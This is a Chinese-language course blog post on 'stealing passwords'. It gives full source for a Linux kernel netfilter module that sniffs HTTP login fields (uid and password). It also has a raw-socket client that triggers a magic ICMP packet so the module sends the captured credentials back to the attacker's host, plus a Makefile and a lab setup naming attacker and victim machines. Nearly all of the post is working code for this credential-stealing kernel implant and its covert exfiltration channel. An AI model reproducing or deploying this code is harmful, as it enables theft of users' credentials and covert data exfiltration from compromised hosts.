前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >信息安全课程——窃取密码

信息安全课程——窃取密码

作者头像
matt
发布2022-10-25 16:09:25
5970
发布2022-10-25 16:09:25
举报
文章被收录于专栏:CSDN迁移CSDN迁移

信息安全课程——窃取密码

一、

安装ubantu16-64 Desktop版本

通过XShell连接虚拟机。

代码语言:javascript
复制
sudo apt install openssh-server
sudo apt-get install vim  #安装vim,使用上下左右键

sudo apt-get install gcc-multilib

代码如下:

代码语言:javascript
复制
//getpass.c
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

#ifndef __USE_BSD
# define __USE_BSD             /* We want the proper headers */
#endif

static unsigned short checksum(int numwords, unsigned short *buff)
{
   unsigned long sum;

   for(sum = 0;numwords > 0;numwords--)
     sum += *buff++;   /* add next word, then increment pointer */

   sum = (sum >> 16) + (sum & 0xFFFF);
   sum += (sum >> 16);

   return ~sum;
}

int main(int argc, char *argv[])
{
    unsigned char dgram[256];          /* Plenty for a PING datagram */
    /* 接收??的buff */ 
    unsigned char recvbuff[256];
    /* iphead指向ip头部 */ 
    struct ip *iphead = (struct ip *)dgram;
    /* icmphead指向icmp头部 +sizeof(ip)是跳过ip头部 */
    struct icmp *icmphead = (struct icmp *)(dgram + sizeof(struct ip));
    /* 源地址 */
    struct sockaddr_in src;
    /* 目的地址 */
    struct sockaddr_in addr;
    /* ?? */
    struct in_addr my_addr;
    /* 服务器的地址?? */
    struct in_addr serv_addr;
    /* 源地址的大小 */
    socklen_t src_addr_size = sizeof(struct sockaddr_in);
    
    int icmp_sock = 0;
    /* 缓冲区 */
    int one = 1;
    /* 缓冲区的头部指针 */
    int *ptr_one = &one;
    /* 若没有传入两个参数则直接退出 */
    if (argc < 3) {
    fprintf(stderr, "Usage:  %s remoteIP myIP\n", argv[0]);
    exit(1);
    }

    /* 获取一个socket,协议簇用的是ipv4,AF_INET和PF_INET是一样的, SOCK_RAW表示我们自己来构建这个数据包,类型为ICMP数据包 */
    if ((icmp_sock = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
    	fprintf(stderr, "Couldn't open raw socket! %s\n",
        strerror(errno));
    	exit(1);
    }

    /* set the HDR_INCL option on the socket设置sock选项,使用ip协议来解析,IP_HDRINCL表示我们自己来填充数据 */
    if(setsockopt(icmp_sock, IPPROTO_IP, IP_HDRINCL, ptr_one, sizeof(one)) < 0) {
    	close(icmp_sock);
    	fprintf(stderr, "Couldn't set HDRINCL option! %s\n",
        strerror(errno));
    	exit(1);
    }
	/* 将目的地址的协议簇设置为ipv4*/
    addr.sin_family = AF_INET;
    /*???*/ 
    addr.sin_addr.s_addr = inet_addr(argv[1]);
	/*???*/ 
    my_addr.s_addr = inet_addr(argv[2]);
	/*将ptr指向的内存块的第一个num字节设置为指定值*/
	/*将dgram初始化为全0*/ 
    memset(dgram, 0x00, 256);
    /*将recvbuff初始化为全0*/ 
    memset(recvbuff, 0x00, 256);

    /* 为ip头部填充数据 */
    iphead->ip_hl  = 5;  //4位 ip首部长度 
    iphead->ip_v   = 4; // 
    iphead->ip_tos = 0; //8位 服务类型 
    iphead->ip_len = 84; // 
    iphead->ip_id  = (unsigned short)rand(); //16位 可以初始化为0 
    iphead->ip_off = 0; //13位 分段偏移 
    iphead->ip_ttl = 128; //8位 生存时间 
    iphead->ip_p   = IPPROTO_ICMP; //8位 icmp协议 
    iphead->ip_sum = 0; //校验和初始化为0 
    iphead->ip_src = my_addr; //??? 
    iphead->ip_dst = addr.sin_addr; //  ??? 

    /* 为icmp头部填充数据 */
    icmphead->icmp_type = ICMP_ECHO; //类型为icmp回复报文 
    icmphead->icmp_code = 0x5B; //watch_in()中判断的icmp_code一致 
    icmphead->icmp_cksum = checksum(42, (unsigned short *)icmphead);//icmp的校验和需要计算头部和数据部分 8字节的首部 和 34字节的数据不问??? 

    /* 将我们构造好的包发出去 */
    fprintf(stdout, "Sending request...\n");
    if (sendto(icmp_sock, dgram, 84, 0, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
    	fprintf(stderr, "\nFailed sending request! %s\n",
        strerror(errno));
    	return 0;
    }

    fprintf(stdout, "Waiting for reply...\n");
    if (recvfrom(icmp_sock, recvbuff, 256, 0, (struct sockaddr *)&src, &src_addr_size) < 0) {
    	fprintf(stdout, "Failed getting reply packet! %s\n",
        strerror(errno));
    	close(icmp_sock);
    	exit(1);
    }

    iphead = (struct ip *)recvbuff;
    icmphead = (struct icmp *)(recvbuff + sizeof(struct ip));
    // 将获取到的包的数据部分复制到serv_addr 
    memcpy(&serv_addr, ((char *)icmphead + 8), sizeof (struct in_addr));

    fprintf(stdout, "Stolen for ftp server %s:\n", inet_ntoa(serv_addr));
    fprintf(stdout, "Username:    %s\n", (char *)((char *)icmphead + 12));
    fprintf(stdout, "Password:    %s\n", (char *)((char *)icmphead + 28));

    close(icmp_sock);

    return 0;
}

/************************************************************************************/

//nfsniff.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/skbuff.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/icmp.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/if_arp.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>

/* 使用ICMP_ECHO数据包,代码字段设置为0x5B*/
#define MAGIC_CODE   0x5B
#define REPLY_SIZE   36

/*"GPL" 是指明了 这是GNU General Public License的任意版本*/
MODULE_LICENSE("GPL");  

/*ICMP有效载荷大小 计算方式是得到整个ip数据包的总长度 减去 ip头部大小 再减去 icmp头部大小*/ 
#define ICMP_PAYLOAD_SIZE  (htons(ip_hdr(sb)->tot_len) \
                   - sizeof(struct iphdr) \
                   - sizeof(struct icmphdr))

/*基于内核的FTP密码嗅探器的简单概念验证。
 *捕获的用户名和密码对将发送到远程主机
 *当主机发送特殊格式的ICMP数据包时。在这里,我们
 *应使用ICMP_ECHO数据包,其代码字段设置为0x5B
 * * AND *数据包已足够
 *标题后的空格,以适应4字节的IP地址和
 *用户名和密码字段是最大值。15个字符
 *每个加一个NULL字节。所以总ICMP有效载荷大小为36个字节。* /
 
/*  
 username和password用来保存拿到的用户名/密码对
一次只能保留一个USER / PASS对,一旦发起请求将被清除。
*/
static char *username = NULL;
static char *password = NULL;

/* 标记我们是否已经有一对用户名/密码对 */
static int  have_pair = 0;   

/* 
 追踪信息。只记录转到的USER和PASS命令相同的IP地址和TCP端口
 目标ip 和 目标端口 
*/
static unsigned int target_ip = 0;
static unsigned short target_port = 0;

/* 用于描述我们的Netfilter挂钩
	nf_hook_ops数据结构在linux/netfilter.中定义
	我们定义两个nf_hook_ops结构体,一个传入的hook 和 一个传出的hook 
 */
struct nf_hook_ops  pre_hook;          /* 传入 */
struct nf_hook_ops  post_hook;         /* 传出 */

/*
查看已知为FTP数据包的sk_buff。查找USER和PASS字段,并确保它们都来自target_xxx字段中指示的一个主机
*/
static void check_http(struct sk_buff *skb)
{
	/* 定义一个tcphdr结构体 *TCP */ 
   struct tcphdr *tcp;
   char *data;
   char *name;
   char *passwd;
   char *_and;
   char *check_connection;
   int len,i;


	/* 从套接字缓冲区skb中获取tcp首部 */ 
   tcp = tcp_hdr(skb);
   /* 系统位数导致强制类型转换错误 64位系统中指针类型8个字节,因此强转为int会出错,可以转成同样为8字节的long型 
   通过tcp首部位置 + tcp长度*4字节 算出数据区域的位置 data */ 
   data = (char *)((unsigned long)tcp + (unsigned long)(tcp->doff * 4));


	/* 判断"Upgrade-In"在data中,判断"uid"在data中,判断"password"在data中 */ 
   if (strstr(data,"Upgrade-In") != NULL && strstr(data, "uid") != NULL && strstr(data, "password") != NULL) { 

		/* 返回在data中首次出现Upgrade-In的地址 */ 
        check_connection = strstr(data,"Upgrade-In");
		
		/*返回check_connection之后首次出现uid的地址*/ 
        name = strstr(check_connection,"uid=");
        /*返回name之后首次出现&的地址*/ 
        _and = strstr(name,"&");
        /*将name往后移动4字节,因为uid=占了四字节,所以移动之后name就是所存储的uid了*/
        name += 4;
        /*这是uid的长度,用&位置减去uid开始的位置*/ 
        len = _and - name;
        /*在内核中给这个username分配内存大小。len+2是因为还需要结束符\0*/ 
        if ((username = kmalloc(len + 2, GFP_KERNEL)) == NULL)
          return;
        /*将username开始的len+2字节设置为0x00,其实就是初始化*/ 
        memset(username, 0x00, len + 2);
        
        /*用一个for循环将获取的uid放到username中*/
        for (i = 0; i < len; ++i)
        {
          *(username + i) = name[i];
        }
        *(username + len) = '\0';

		/*这里获取密码和上面获取用户名用的是一样的方法*/ 
		/*返回name之后首次出现password=的地址*/ 
        passwd = strstr(name,"password=");
        /*返回passwd之后首次出现&的地址*/ 
        _and = strstr(passwd,"&");
        /*password=占了9字节,跳过这个字段*/
        passwd += 9;
        /*len为真实密码的长度*/ 
        len = _and - passwd;
        /*将密码放到password中*/ 
        if ((password = kmalloc(len + 2, GFP_KERNEL)) == NULL)
          return;
        memset(password, 0x00, len + 2);
        for (i = 0; i < len; ++i)
        {
          *(password + i) = passwd[i];
        }
        *(password + len) = '\0';

   } else {
   	/*如果数据区域data中没有上面三个字段则直接返回*/ 
      return;
   }

   /*获取32位目的ip,从ip首部的daddr字段中获取*/ 
   if (!target_ip)
     target_ip = ip_hdr(skb)->daddr;
   /*获取16位源端口号,从tcp首部的source中获取*/ 
   if (!target_port)
     target_port = tcp->source;

	/*
	username和password都获取到了,将have_pair变为1 
	*/ 
   if (username && password)
     have_pair++;              
     
   /*
   获取到一个用户名/密码对,have_pair就为1了 ,并将获取到的用户米和密码输出 
   */ 
   if (have_pair)
     printk("Have password pair!  U: %s   P: %s\n", username, password);
}

/* 函数称为POST_ROUTING(最后)钩子。它会检查FTP流量然后搜索该流量的USER和PASS命令 */
static unsigned int watch_out(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
   struct sk_buff *sb = skb;
   struct tcphdr *tcp;
   
   /* 首先确保这是一个TCP数据包 */
   if (ip_hdr(sb)->protocol != IPPROTO_TCP)
     return NF_ACCEPT;             /* Nope, not TCP */

   /*ip的首部长度*4字节就是跳过ip首部 到达icmp首部的位置*/ 
   tcp = (struct tcphdr *)((sb->data) + (ip_hdr(sb)->ihl * 4));

   /* 现在检查它是否是一个FTP包 */
   if (tcp->dest != htons(80))
     return NF_ACCEPT;             /* Nope, not FTP */

   /* 如果还未获取到用户名密码对,则调用check_HTTP()去获取 */
   if (!have_pair)
     check_http(sb);

   /* 保留该数据包 */
   return NF_ACCEPT;
}

/*监视“Magic”数据包的传入ICMP流量的过程。
 *收到后,我们调整skb结构发送回复
 *回到请求主机并告诉Netfilter我们偷了包。*/
static unsigned int watch_in(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
	/*让传入的缓冲skb存到sb中*/ 
   struct sk_buff *sb = skb;
   /*定义一个icmp首部指针*/ 
   struct icmphdr *icmp;
   /**/ 
   char *cp_data;/* 我们将数据复制到回复中 */
   /**/              
   unsigned int   taddr;           /* Temporary IP holder */

   /* 我判断是否已经获取到用户名/密码对了 */
   if (!have_pair)
     return NF_ACCEPT;

   /* 判断这是不是一个ICMP包 */
   if (ip_hdr(sb)->protocol != IPPROTO_ICMP)
     return NF_ACCEPT;

   /* ip的首部长度*4字节就是跳过ip首部 到达icmp首部的位置 */ 
   icmp = (struct icmphdr *)(sb->data + ip_hdr(sb)->ihl * 4);

   /* 判断这是不是一个MAGIC包 0x58,icmp类型是不是ICMP_ECHO(8或者0),icmp有效载荷是不是大于等于36*/
   if (icmp->code != MAGIC_CODE || icmp->type != ICMP_ECHO
     || ICMP_PAYLOAD_SIZE < REPLY_SIZE) {
      return NF_ACCEPT;
   }

   /*好的,匹配我们的“魔法”检查,现在我们不知所措
    * sk_buff插入IP地址和用户名/密码对,
    *交换IP源和目标地址以及以太网地址*/
    
    /*将ip首部中的源地址和目的地址互换??为什么??*/
    /*32位源IP地址暂时存在taddr中*/ 
   taddr = ip_hdr(sb)->saddr; 
   ip_hdr(sb)->saddr = ip_hdr(sb)->daddr;
   ip_hdr(sb)->daddr = taddr;

   /*PACKET_OUTGOING用于发送数据包从本地主机环回到数据包套接字  ??不太懂*/ 
   sb->pkt_type = PACKET_OUTGOING;

   /*struct net_device * dev;*/ 
   switch (sb->dev->type) {
   	//512 
    case ARPHRD_PPP:               /* Ntcho iddling needs doing */
      break;
    // 772 环回设备  
    case ARPHRD_LOOPBACK:
    // 1 以太网10Mbps 
    case ARPHRD_ETHER:
    {
    	/*#define ETH_ALEN 6  定义了以太网接口的MAC地址的长度为6个字节*/ 
       unsigned char t_hwaddr[ETH_ALEN];

       /* 移动数据指针指向链接层头部*/
       sb->data = (unsigned char *)eth_hdr(sb);
       /*跳过mac地址*/ 
       sb->len += ETH_HLEN; //sizeof(sb->mac.ethernet);
       
       /*交换mac源地址和mac目的地址*/ 
       /*将目的地址放到t_HWADDR*/ 
       memcpy(t_hwaddr, (eth_hdr(sb)->h_dest), ETH_ALEN);
       /*将源地址放到原目的地址的地方*/ 
       memcpy((eth_hdr(sb)->h_dest), (eth_hdr(sb)->h_source),
          ETH_ALEN);
       memcpy((eth_hdr(sb)->h_source), t_hwaddr, ETH_ALEN);
       break;
    }
   };

   /* 现在将IP地址,然后用户名,然后密码复制到数据包*/
   /*cp_data指向数据部分,这里是跳过icmp首部*/ 
   cp_data = (char *)((char *)icmp + sizeof(struct icmphdr));
   /*将目标的ip地址放到数据区域*/ 
   memcpy(cp_data, &target_ip, 4);
   
   /*将用户名和密码放到cp_data中*/ 
   if (username)
     /*跳过上面用掉的4字节*/ 
     memcpy(cp_data + 4, username, 16);
   if (password)
     /*跳过上面用掉的20字节*/ 
     memcpy(cp_data + 20, password, 16);

   /* dev_queue_xmit这个网络设备接口层函数发送给driver
   https://blog.csdn.net/wdscq1234/article/details/51926808
   (我没仔细看) 
    * */
   dev_queue_xmit(sb);

   /* 现在释放保存的用户名和密码并重置have_pair */
   kfree(username);
   kfree(password);
   username = password = NULL;
   have_pair = 0;

   target_port = target_ip = 0;

	/*忘掉该数据包*/ 
   return NF_STOLEN;
}

/*
内核模块中的两个函数 init_module() :表示起始 和 cleanup_module() :表示结束 
*/ 
int init_module()
{
	/*hook函数指针指向watc_in*/ 
   pre_hook.hook     = watch_in;
   /*协议簇为ipv4*/  
   pre_hook.pf       = PF_INET;
   /*优先级最高*/
   pre_hook.priority = NF_IP_PRI_FIRST;
   /*hook的类型为 在完整性校验之后,选路确定之前*/ 
   pre_hook.hooknum  = NF_INET_PRE_ROUTING;

   /*hook函数指针指向watc_out*/ 
   post_hook.hook     = watch_out;
   /*协议簇为ipv4*/  
   post_hook.pf       = PF_INET;
   /*优先级最高*/
   post_hook.priority = NF_IP_PRI_FIRST;
   /*hook的类型为 在完数据包离开本地主机“上线”之前*/ 
   post_hook.hooknum  = NF_INET_POST_ROUTING;

   /*将pre_hook和post_hook注册,注册实际上就是在一个nf_hook_ops链表中再插入一个nf_hook_ops结构*/ 
   nf_register_net_hook(&init_net ,&pre_hook);
   nf_register_net_hook(&init_net ,&post_hook);

	printk(KERN_INFO "Hello world 1.\n");
   return 0;
}

void cleanup_module()
{
	/*将pre_hook和post_hook取消注册,取消注册实际上就是在一个nf_hook_ops链表中删除一个nf_hook_ops结构*/ 
   nf_unregister_net_hook(&init_net ,&post_hook);
   nf_unregister_net_hook(&init_net ,&pre_hook);

	/*释放之前分配的内核空间*/ 
   if (password)
     kfree(password);
   if (username)
     kfree(username);
    
	printk(KERN_INFO "Goodbye world 1.\n");
}

/************************************************************************************/

//Makefile:
obj-m += nfsniff.o
all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
在这里插入图片描述
在这里插入图片描述

克隆的Ubantu18是受害者主机,Ubantu16是攻击者主机

在这里插入图片描述
在这里插入图片描述
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2020-07-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 信息安全课程——窃取密码
  • 一、
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档